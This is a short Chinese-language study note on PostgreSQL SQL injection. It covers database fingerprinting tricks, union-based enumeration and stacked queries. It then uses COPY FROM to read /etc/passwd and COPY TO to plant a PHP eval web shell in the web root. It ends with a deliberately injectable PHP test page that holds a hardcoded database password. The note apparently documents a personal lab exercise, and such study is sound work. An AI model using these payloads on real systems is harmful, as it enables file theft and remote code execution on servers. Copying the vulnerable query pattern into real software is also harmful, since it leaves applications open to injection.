学习笔记-PostgreSql注入

什么是PostgreSQL?

PostgreSQL是一个功能强大的开源对象关系数据库管理系统(ORDBMS)。 用于安全地存储数据; 支持最佳做法,并允许在处理请求时检索它们。PostgreSQL(也称为Post-gress-Q-L)由PostgreSQL全球开发集团(全球志愿者团队)开发。 它不受任何公司或其他私人实体控制。 它是开源的,其源代码是免费提供的。PostgreSQL是跨平台的,可以在许多操作系统上运行,如Linux,FreeBSD,OS X,Solaris和Microsoft Windows等。

测试过程

目标

1
and 1=1

如何判断目标的database是不是postgresql?

可以在常量后面加 ::类型名, 1等于1::int
postgresql还支持||字符串连接符以及chr函数—-chr(1)||chr(1)=chr(1)||chr(1)返回正常

所以:
union注入走一下

order by 判断字段为4

union 查询数据

显示位在第二

试一下读文件
postgresql可以通过;来分割执行自己定义的语句

1
create table wing(wing text  not null) # 语法和其他数据库一样

读取文件内容并插入表中

1
copy wing(wing) from '/etc/passwd'

然后通过union查询出来

写shell

1
copy (select '<?php eval($_REQUEST["w"]);?>') to '/var/www/wing.php'

getshell


测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
error_reporting(E_ALL);

$conn_string = "host=localhost port=5432 dbname=postgres user=postgres password=pgsql123";
$conn = pg_connect($conn_string);
$rs = pg_query($conn, "SELECT * FROM news_list WHERE id = " . $_GET['id']);
if(pg_num_rows($rs) == 0)
{
echo "No record.";
}
else
{
while($row = pg_fetch_array($rs))
{
echo $row['title'];
}
}
pg_close($conn);

sqlmap验证:

打赏wing!